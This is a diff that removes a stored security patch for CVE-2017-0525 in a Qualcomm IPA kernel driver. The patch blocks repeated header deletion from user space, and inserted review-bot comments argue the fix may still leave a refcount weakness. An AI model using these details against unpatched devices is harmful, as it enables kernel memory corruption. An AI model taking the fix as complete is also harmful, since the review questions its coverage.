- } -- if (ipa3_del_hdr((struct ipa_ioc_del_hdr *)param)) { -+ if (ipa3_del_hdr_by_user((struct ipa_ioc_del_hdr *)param, -+ true)) { - retval = -EFAULT; - break; - } -@@ -1553,8 +1554,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EINVAL; - break; - } -- if (ipa3_del_hdr_proc_ctx( -- (struct ipa_ioc_del_hdr_proc_ctx *)param)) { -+ if (ipa3_del_hdr_proc_ctx_by_user( -+ (struct ipa_ioc_del_hdr_proc_ctx *)param, true)) { - retval = -EFAULT; - break; - } -@@ -3003,7 +3004,7 @@ fail_schedule_delayed_work: - if (ipa3_ctx->dflt_v4_rt_rule_hdl) - __ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl); - if (ipa3_ctx->excp_hdr_hdl) -- __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl); -+ __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false); - ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd); - fail_cmd: - return result; -@@ -3015,7 +3016,7 @@ static void ipa3_teardown_apps_pipes(void) - ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_data_in); - __ipa3_del_rt_rule(ipa3_ctx->dflt_v6_rt_rule_hdl); - __ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl); -- __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl); -+ __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false); - ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd); - } - -diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c -index c7202be..1c3af6e 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c -+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -573,7 +573,8 @@ error: - return -EPERM; - } - --static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) -+static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, -+ bool release_hdr, bool by_user) - { - struct ipa3_hdr_proc_ctx_entry *entry; - struct ipa3_hdr_proc_ctx_tbl *htbl = &ipa3_ctx->hdr_proc_ctx_tbl; -@@ -587,6 +588,14 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - IPADBG("del proc ctx cnt=%d ofst=%d\n", - htbl->proc_ctx_cnt, entry->offset_entry->offset); - -+ if (by_user && entry->user_deleted) { -+ IPAERR("proc_ctx already deleted by user\n"); -+ return -EINVAL; -+ } -+ -+ if (by_user) -+ entry->user_deleted = true; -+ - if (--entry->ref_cnt) { - IPADBG("proc_ctx_hdl %x ref_cnt %d\n", - proc_ctx_hdl, entry->ref_cnt); -@@ -594,7 +603,7 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - } - - if (release_hdr) -- __ipa3_del_hdr(entry->hdr->id); -+ __ipa3_del_hdr(entry->hdr->id, false); - - /* move the offset entry to appropriate free list */ - list_move(&entry->offset_entry->link, -@@ -611,7 +620,7 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - } - - --int __ipa3_del_hdr(u32 hdr_hdl) -+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user) - { - struct ipa3_hdr_entry *entry; - struct ipa3_hdr_tbl *htbl = &ipa3_ctx->hdr_tbl; -@@ -622,7 +631,7 @@ int __ipa3_del_hdr(u32 hdr_hdl) - return -EINVAL; - } - -- if (!entry || (entry->cookie != IPA_COOKIE)) { -+ if (entry->cookie != IPA_COOKIE) { - IPAERR("bad parm\n"); - return -EINVAL; - } -@@ -635,6 +644,14 @@ int __ipa3_del_hdr(u32 hdr_hdl) - entry->hdr_len, htbl->hdr_cnt, - entry->offset_entry->offset); - -+ if (by_user && entry->user_deleted) { -+ IPAERR("proc_ctx already deleted by user\n"); -+ return -EINVAL; -+ } -+ -+ if (by_user) -+ entry->user_deleted = true; -+ - if 
(--entry->ref_cnt) { - IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt); - return 0; -@@ -645,7 +662,7 @@ int __ipa3_del_hdr(u32 hdr_hdl) - entry->phys_base, - entry->hdr_len, - DMA_TO_DEVICE); -- __ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false); -+ __ipa3_del_hdr_proc_ctx(entry->proc_ctx->id, false, false); - } else { - /* move the offset entry to appropriate free list */ - list_move(&entry->offset_entry->link, -@@ -707,15 +724,16 @@ bail: - } - - /** -- * ipa3_del_hdr() - Remove the specified headers from SW and optionally commit them -- * to IPA HW -+ * ipa3_del_hdr_by_user() - Remove the specified headers -+ * from SW and optionally commit them to IPA HW - * @hdls: [inout] set of headers to delete -+ * @by_user: Operation requested by user? - * - * Returns: 0 on success, negative on failure - * - * Note: Should not be called from atomic context - */ --int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls) -+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user) - { - int i; - int result = -EFAULT; -@@ -727,7 +745,7 @@ int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls) - - mutex_lock(&ipa3_ctx->lock); - for (i = 0; i < hdls->num_hdls; i++) { -- if (__ipa3_del_hdr(hdls->hdl[i].hdl)) { -+ if (__ipa3_del_hdr(hdls->hdl[i].hdl, by_user)) { - IPAERR("failed to del hdr %i\n", i); - hdls->hdl[i].status = -1; - } else { -@@ -748,6 +766,20 @@ bail: - } - - /** -+ * ipa3_del_hdr() - Remove the specified headers from SW and optionally commit them -+ * to IPA HW -+ * @hdls: [inout] set of headers to delete -+ * -+ * Returns: 0 on success, negative on failure -+ * -+ * Note: Should not be called from atomic context -+ */ -+int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls) -+{ -+ return ipa3_del_hdr_by_user(hdls, false); -+} -+ -+/** - * ipa3_add_hdr_proc_ctx() - add the specified headers to SW - * and optionally commit them to IPA HW - * @proc_ctxs: [inout] set of processing context headers to add -@@ -792,16 +824,18 @@ bail: - } - - /** -- * 
ipa3_del_hdr_proc_ctx() - -+ * ipa3_del_hdr_proc_ctx_by_user() - - * Remove the specified processing context headers from SW and - * optionally commit them to IPA HW. - * @hdls: [inout] set of processing context headers to delete -+ * @by_user: Operation requested by user? - * - * Returns: 0 on success, negative on failure - * - * Note: Should not be called from atomic context - */ --int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) -+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls, -+ bool by_user) - { - int i; - int result; -@@ -813,7 +847,7 @@ int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) - - mutex_lock(&ipa3_ctx->lock); - for (i = 0; i < hdls->num_hdls; i++) { -- if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) { -+ if (__ipa3_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) { - IPAERR("failed to del hdr %i\n", i); - hdls->hdl[i].status = -1; - } else { -@@ -834,6 +868,21 @@ bail: - } - - /** -+ * ipa3_del_hdr_proc_ctx() - -+ * Remove the specified processing context headers from SW and -+ * optionally commit them to IPA HW. 
-+ * @hdls: [inout] set of processing context headers to delete -+ * -+ * Returns: 0 on success, negative on failure -+ * -+ * Note: Should not be called from atomic context -+ */ -+int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) -+{ -+ return ipa3_del_hdr_proc_ctx_by_user(hdls, false); -+} -+ -+/** - * ipa3_commit_hdr() - commit to IPA HW the current header table in SW - * - * Returns: 0 on success, negative on failure -@@ -1061,7 +1110,7 @@ int __ipa3_release_hdr(u32 hdr_hdl) - { - int result = 0; - -- if (__ipa3_del_hdr(hdr_hdl)) { -+ if (__ipa3_del_hdr(hdr_hdl, false)) { - IPADBG("fail to del hdr %x\n", hdr_hdl); - result = -EFAULT; - goto bail; -@@ -1089,7 +1138,7 @@ int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl) - { - int result = 0; - -- if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true)) { -+ if (__ipa3_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) { - IPADBG("fail to del hdr %x\n", proc_ctx_hdl); - result = -EFAULT; - goto bail; -diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h -index a6c74973..3f19c21 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h -+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h -@@ -316,6 +316,7 @@ struct ipa3_rt_tbl { - * @id: header entry id - * @is_eth2_ofst_valid: is eth2_ofst field valid? - * @eth2_ofst: offset to start of Ethernet-II/802.3 header -+ * @user_deleted: is the header deleted by the user? - */ - struct ipa3_hdr_entry { - struct list_head link; -@@ -333,6 +334,7 @@ struct ipa3_hdr_entry { - int id; - u8 is_eth2_ofst_valid; - u16 eth2_ofst; -+ bool user_deleted; - }; - - /** -@@ -372,6 +374,7 @@ struct ipa3_hdr_proc_ctx_offset_entry { - * @cookie: cookie used for validity check - * @ref_cnt: reference counter of routing table - * @id: processing context header entry id -+ * @user_deleted: is the hdr processing context deleted by the user? 
- */ - struct ipa3_hdr_proc_ctx_entry { - struct list_head link; -@@ -381,6 +384,7 @@ struct ipa3_hdr_proc_ctx_entry { - u32 cookie; - u32 ref_cnt; - int id; -+ bool user_deleted; - }; - - /** -@@ -1520,6 +1524,8 @@ int ipa3_add_hdr(struct ipa_ioc_add_hdr *hdrs); - - int ipa3_del_hdr(struct ipa_ioc_del_hdr *hdls); - -+int ipa3_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user); -+ - int ipa3_commit_hdr(void); - - int ipa3_reset_hdr(void); -@@ -1537,6 +1543,9 @@ int ipa3_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs); - - int ipa3_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls); - -+int ipa3_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls, -+ bool by_user); -+ - /* - * Routing - */ -@@ -1842,7 +1851,7 @@ int ipa3_active_clients_log_print_table(char *buf, int size); - void ipa3_active_clients_log_clear(void); - int ipa3_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev); - int __ipa3_del_rt_rule(u32 rule_hdl); --int __ipa3_del_hdr(u32 hdr_hdl); -+int __ipa3_del_hdr(u32 hdr_hdl, bool by_user); - int __ipa3_release_hdr(u32 hdr_hdl); - int __ipa3_release_hdr_proc_ctx(u32 proc_ctx_hdl); - int _ipa_read_ep_reg_v3_0(char *buf, int max_len, int pipe); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0525/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0525/4.4/0003.patch deleted file mode 100644 index f26370ee..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0525/4.4/0003.patch +++ /dev/null 
@@ -1,669 +0,0 @@ -From 7452cc75cbd363107a1e5d4c5f1327d3edc797ef Mon Sep 17 00:00:00 2001 -From: Ghanim Fodi -Date: Thu, 12 Jan 2017 15:14:15 +0200 -Subject: msm: ipa: Prevent multiple header deletion from user space - -An IPA header or processing context can be added once -and later deleted once from user space. -Multiple deletion may cause invalid state of the headers -software cache. - -Change-Id: Ic0b8472b7fd8a76233a007d90c832af726184574 -CRs-fixed: 1097714 -Signed-off-by: Ghanim Fodi ---- - drivers/platform/msm/ipa/ipa_v2/ipa.c | 13 ++--- - drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c | 79 +++++++++++++++++++++++++------ - drivers/platform/msm/ipa/ipa_v2/ipa_i.h | 11 ++++- - drivers/platform/msm/ipa/ipa_v3/ipa.c | 13 ++--- - drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c | 79 +++++++++++++++++++++++++------ - drivers/platform/msm/ipa/ipa_v3/ipa_i.h | 13 ++++- - 6 files changed, 163 insertions(+), 45 deletions(-) - -diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa.c b/drivers/platform/msm/ipa/ipa_v2/ipa.c -index d82651f..09ec845 100644 ---- a/drivers/platform/msm/ipa/ipa_v2/ipa.c -+++ b/drivers/platform/msm/ipa/ipa_v2/ipa.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -733,7 +733,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- if (ipa2_del_hdr((struct ipa_ioc_del_hdr *)param)) { -+ if (ipa2_del_hdr_by_user((struct ipa_ioc_del_hdr *)param, -+ true)) { - retval = -EFAULT; - break; - } -@@ -1417,8 +1418,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- if (ipa2_del_hdr_proc_ctx( -- (struct ipa_ioc_del_hdr_proc_ctx *)param)) { -+ if (ipa2_del_hdr_proc_ctx_by_user( -+ (struct ipa_ioc_del_hdr_proc_ctx *)param, true)) { - retval = -EFAULT; - break; - } -@@ -2715,7 +2716,7 @@ fail_schedule_delayed_work: - if (ipa_ctx->dflt_v4_rt_rule_hdl) - __ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl); - if (ipa_ctx->excp_hdr_hdl) -- __ipa_del_hdr(ipa_ctx->excp_hdr_hdl); -+ __ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false); - ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd); - fail_cmd: - return result; -@@ -2727,7 +2728,7 @@ static void ipa_teardown_apps_pipes(void) - ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_data_in); - __ipa_del_rt_rule(ipa_ctx->dflt_v6_rt_rule_hdl); - __ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl); -- __ipa_del_hdr(ipa_ctx->excp_hdr_hdl); -+ __ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false); - ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd); - } - -diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c -index 40d42e17..51f34f0 100644 ---- a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c -+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -741,7 +741,8 @@ error: - return -EPERM; - } - --static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) -+static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, -+ bool release_hdr, bool by_user) - { - struct ipa_hdr_proc_ctx_entry *entry; - struct ipa_hdr_proc_ctx_tbl *htbl = &ipa_ctx->hdr_proc_ctx_tbl; -@@ -755,6 +756,14 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - IPADBG("del ctx proc cnt=%d ofst=%d\n", - htbl->proc_ctx_cnt, entry->offset_entry->offset); - -+ if (by_user && entry->user_deleted) { -+ IPAERR("proc_ctx already deleted by user\n"); -+ return -EINVAL; -+ } -+ -+ if (by_user) -+ entry->user_deleted = true; -+ - if (--entry->ref_cnt) { - IPADBG("proc_ctx_hdl %x ref_cnt %d\n", - proc_ctx_hdl, entry->ref_cnt); -@@ -762,7 +771,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - } - - if (release_hdr) -- __ipa_del_hdr(entry->hdr->id); -+ __ipa_del_hdr(entry->hdr->id, false); - - /* move the offset entry to appropriate free list */ - list_move(&entry->offset_entry->link, -@@ -779,7 +788,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - } - - --int __ipa_del_hdr(u32 hdr_hdl) -+int __ipa_del_hdr(u32 hdr_hdl, bool by_user) - { - struct ipa_hdr_entry *entry; - struct ipa_hdr_tbl *htbl = &ipa_ctx->hdr_tbl; -@@ -790,7 +799,7 @@ int __ipa_del_hdr(u32 hdr_hdl) - return -EINVAL; - } - -- if (!entry || (entry->cookie != IPA_COOKIE)) { -+ if (entry->cookie != IPA_COOKIE) { - IPAERR("bad parm\n"); - return -EINVAL; - } -@@ -802,6 +811,14 @@ int __ipa_del_hdr(u32 hdr_hdl) - IPADBG("del hdr of sz=%d hdr_cnt=%d ofst=%d\n", entry->hdr_len, - htbl->hdr_cnt, entry->offset_entry->offset); - -+ if (by_user && entry->user_deleted) { -+ IPAERR("hdr already deleted by user\n"); -+ return -EINVAL; -+ } -+ -+ if (by_user) -+ 
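Review bot: The `user_deleted` flag added to `__ipa_del_hdr_proc_ctx()` records that user space has deleted the entry once, but nothing in the hunk records whether user space ever held a reference to that entry. `if (by_user) entry->user_deleted = true;` is followed by `--entry->ref_cnt` for any valid handle, so one ioctl delete can still drop a reference on an entry that only kernel code added (the ipa.c hunks show the driver deleting `excp_hdr_hdl` itself with `by_user` false). Consider marking entries as user-added on the add path and rejecting `by_user` deletes of entries without that mark; this is inferred from the visible lines, because the add path is not part of the patch. It is also worth confirming that entries are zero-allocated so `user_deleted` starts out false. The same pattern is in `__ipa_del_hdr()`, `__ipa3_del_hdr_proc_ctx()` and `__ipa3_del_hdr()`, and each function body continues outside its hunk.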
entry->user_deleted = true; -+ - if (--entry->ref_cnt) { - IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt); - return 0; -@@ -812,7 +829,7 @@ int __ipa_del_hdr(u32 hdr_hdl) - entry->phys_base, - entry->hdr_len, - DMA_TO_DEVICE); -- __ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false); -+ __ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false, false); - } else { - /* move the offset entry to appropriate free list */ - list_move(&entry->offset_entry->link, -@@ -879,15 +896,16 @@ bail: - } - - /** -- * ipa2_del_hdr() - Remove the specified headers from SW and optionally commit them -- * to IPA HW -+ * ipa2_del_hdr_by_user() - Remove the specified headers -+ * from SW and optionally commit them to IPA HW - * @hdls: [inout] set of headers to delete -+ * @by_user: Operation requested by user? - * - * Returns: 0 on success, negative on failure - * - * Note: Should not be called from atomic context - */ --int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls) -+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user) - { - int i; - int result = -EFAULT; -@@ -904,7 +922,7 @@ int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls) - - mutex_lock(&ipa_ctx->lock); - for (i = 0; i < hdls->num_hdls; i++) { -- if (__ipa_del_hdr(hdls->hdl[i].hdl)) { -+ if (__ipa_del_hdr(hdls->hdl[i].hdl, by_user)) { - IPAERR("failed to del hdr %i\n", i); - hdls->hdl[i].status = -1; - } else { -@@ -925,6 +943,20 @@ bail: - } - - /** -+ * ipa2_del_hdr() - Remove the specified headers from SW -+ * and optionally commit them to IPA HW -+ * @hdls: [inout] set of headers to delete -+ * -+ * Returns: 0 on success, negative on failure -+ * -+ * Note: Should not be called from atomic context -+ */ -+int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls) -+{ -+ return ipa2_del_hdr_by_user(hdls, false); -+} -+ -+/** - * ipa2_add_hdr_proc_ctx() - add the specified headers to SW - * and optionally commit them to IPA HW - * @proc_ctxs: [inout] set of processing context headers to add -@@ -976,16 +1008,18 @@ bail: - } - - 
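Review bot: The kernel-doc line `@by_user: Operation requested by user?` on `ipa2_del_hdr_by_user()` is missing documentation of what the flag changes, even though it is the whole point of the new entry point. Something like `@by_user: true when called on behalf of user space (ioctl); a handle user space already deleted is then refused and its status set to -1` would match the loop shown in the next hunk. The same wording is used for `ipa2_del_hdr_proc_ctx_by_user()` and the two ipa_v3 variants. The kernel-doc for the `ipa2_del_hdr()` wrapper could also say that it is the in-kernel path and always passes `by_user` as false.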
/** -- * ipa2_del_hdr_proc_ctx() - -+ * ipa2_del_hdr_proc_ctx_by_user() - - * Remove the specified processing context headers from SW and - * optionally commit them to IPA HW. - * @hdls: [inout] set of processing context headers to delete -+ * @by_user: Operation requested by user? - * - * Returns: 0 on success, negative on failure - * - * Note: Should not be called from atomic context - */ --int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) -+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls, -+ bool by_user) - { - int i; - int result; -@@ -1004,7 +1038,7 @@ int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) - - mutex_lock(&ipa_ctx->lock); - for (i = 0; i < hdls->num_hdls; i++) { -- if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) { -+ if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) { - IPAERR("failed to del hdr %i\n", i); - hdls->hdl[i].status = -1; - } else { -@@ -1025,6 +1059,21 @@ bail: - } - - /** -+ * ipa2_del_hdr_proc_ctx() - -+ * Remove the specified processing context headers from SW and -+ * optionally commit them to IPA HW. 
-+ * @hdls: [inout] set of processing context headers to delete -+ * -+ * Returns: 0 on success, negative on failure -+ * -+ * Note: Should not be called from atomic context -+ */ -+int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls) -+{ -+ return ipa2_del_hdr_proc_ctx_by_user(hdls, false); -+} -+ -+/** - * ipa2_commit_hdr() - commit to IPA HW the current header table in SW - * - * Returns: 0 on success, negative on failure -@@ -1252,7 +1301,7 @@ int __ipa_release_hdr(u32 hdr_hdl) - { - int result = 0; - -- if (__ipa_del_hdr(hdr_hdl)) { -+ if (__ipa_del_hdr(hdr_hdl, false)) { - IPADBG("fail to del hdr %x\n", hdr_hdl); - result = -EFAULT; - goto bail; -@@ -1280,7 +1329,7 @@ int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl) - { - int result = 0; - -- if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true)) { -+ if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) { - IPADBG("fail to del hdr %x\n", proc_ctx_hdl); - result = -EFAULT; - goto bail; -diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h -index 967036a..2c2a9c6 100644 ---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h -+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h -@@ -281,6 +281,7 @@ struct ipa_rt_tbl { - * @id: header entry id - * @is_eth2_ofst_valid: is eth2_ofst field valid? - * @eth2_ofst: offset to start of Ethernet-II/802.3 header -+ * @user_deleted: is the header deleted by the user? - */ - struct ipa_hdr_entry { - struct list_head link; -@@ -298,6 +299,7 @@ struct ipa_hdr_entry { - int id; - u8 is_eth2_ofst_valid; - u16 eth2_ofst; -+ bool user_deleted; - }; - - /** -@@ -361,6 +363,7 @@ struct ipa_hdr_proc_ctx_add_hdr_cmd_seq { - * @cookie: cookie used for validity check - * @ref_cnt: reference counter of routing table - * @id: processing context header entry id -+ * @user_deleted: is the hdr processing context deleted by the user? 
- */ - struct ipa_hdr_proc_ctx_entry { - struct list_head link; -@@ -370,6 +373,7 @@ struct ipa_hdr_proc_ctx_entry { - u32 cookie; - u32 ref_cnt; - int id; -+ bool user_deleted; - }; - - /** -@@ -1400,6 +1404,8 @@ int ipa2_add_hdr(struct ipa_ioc_add_hdr *hdrs); - - int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls); - -+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user); -+ - int ipa2_commit_hdr(void); - - int ipa2_reset_hdr(void); -@@ -1417,6 +1423,9 @@ int ipa2_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs); - - int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls); - -+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls, -+ bool by_user); -+ - /* - * Routing - */ -@@ -1709,7 +1718,7 @@ int ipa2_active_clients_log_print_table(char *buf, int size); - void ipa2_active_clients_log_clear(void); - int ipa_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev); - int __ipa_del_rt_rule(u32 rule_hdl); --int __ipa_del_hdr(u32 hdr_hdl); -+int __ipa_del_hdr(u32 hdr_hdl, bool by_user); - int __ipa_release_hdr(u32 hdr_hdl); - int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl); - int _ipa_read_gen_reg_v1_1(char *buff, int max_len); -diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c -index 3d276b0..2da3b0d 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c -+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -784,7 +784,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- if (ipa3_del_hdr((struct ipa_ioc_del_hdr *)param)) { -+ if (ipa3_del_hdr_by_user((struct ipa_ioc_del_hdr *)param, -+ true)) { - retval = -EFAULT; - break; - } -@@ -1553,8 +1554,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- if (ipa3_del_hdr_proc_ctx( -- (struct ipa_ioc_del_hdr_proc_ctx *)param)) { -+ if (ipa3_del_hdr_proc_ctx_by_user( -+ (struct ipa_ioc_del_hdr_proc_ctx *)param, true)) { - retval = -EFAULT; - break; - } -@@ -2921,7 +2922,7 @@ fail_schedule_delayed_work: - if (ipa3_ctx->dflt_v4_rt_rule_hdl) - __ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl); - if (ipa3_ctx->excp_hdr_hdl) -- __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl); -+ __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false); - ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd); - fail_cmd: - return result; -@@ -2933,7 +2934,7 @@ static void ipa3_teardown_apps_pipes(void) - ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_data_in); - __ipa3_del_rt_rule(ipa3_ctx->dflt_v6_rt_rule_hdl); - __ipa3_del_rt_rule(ipa3_ctx->dflt_v4_rt_rule_hdl); -- __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl); -+ __ipa3_del_hdr(ipa3_ctx->excp_hdr_hdl, false); - ipa3_teardown_sys_pipe(ipa3_ctx->clnt_hdl_cmd); - } - -diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c -index 93fa149..69dca76 100644 ---- a/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c -+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -576,7 +576,8 @@ error: - return -EPERM; - } - --static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) -+static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, -+ bool release_hdr, bool by_user) - { - struct ipa3_hdr_proc_ctx_entry *entry; - struct ipa3_hdr_proc_ctx_tbl *htbl = &ipa3_ctx->hdr_proc_ctx_tbl; -@@ -590,6 +591,14 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - IPADBG("del proc ctx cnt=%d ofst=%d\n", - htbl->proc_ctx_cnt, entry->offset_entry->offset); - -+ if (by_user && entry->user_deleted) { -+ IPAERR("proc_ctx already deleted by user\n"); -+ return -EINVAL; -+ } -+ -+ if (by_user) -+ entry->user_deleted = true; -+ - if (--entry->ref_cnt) { - IPADBG("proc_ctx_hdl %x ref_cnt %d\n", - proc_ctx_hdl, entry->ref_cnt); -@@ -597,7 +606,7 @@ static int __ipa3_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr) - } - - if (release_hdr) -- __ipa3_del_hdr(entry->hdr->id); -+ __ipa3_del_hdr(entry->hdr->id, false); - - /* move the offset entry to appropriate free list */ - list_move(&entry->offset_entry->link, -@@ -614,7 +623,7 @@ static int 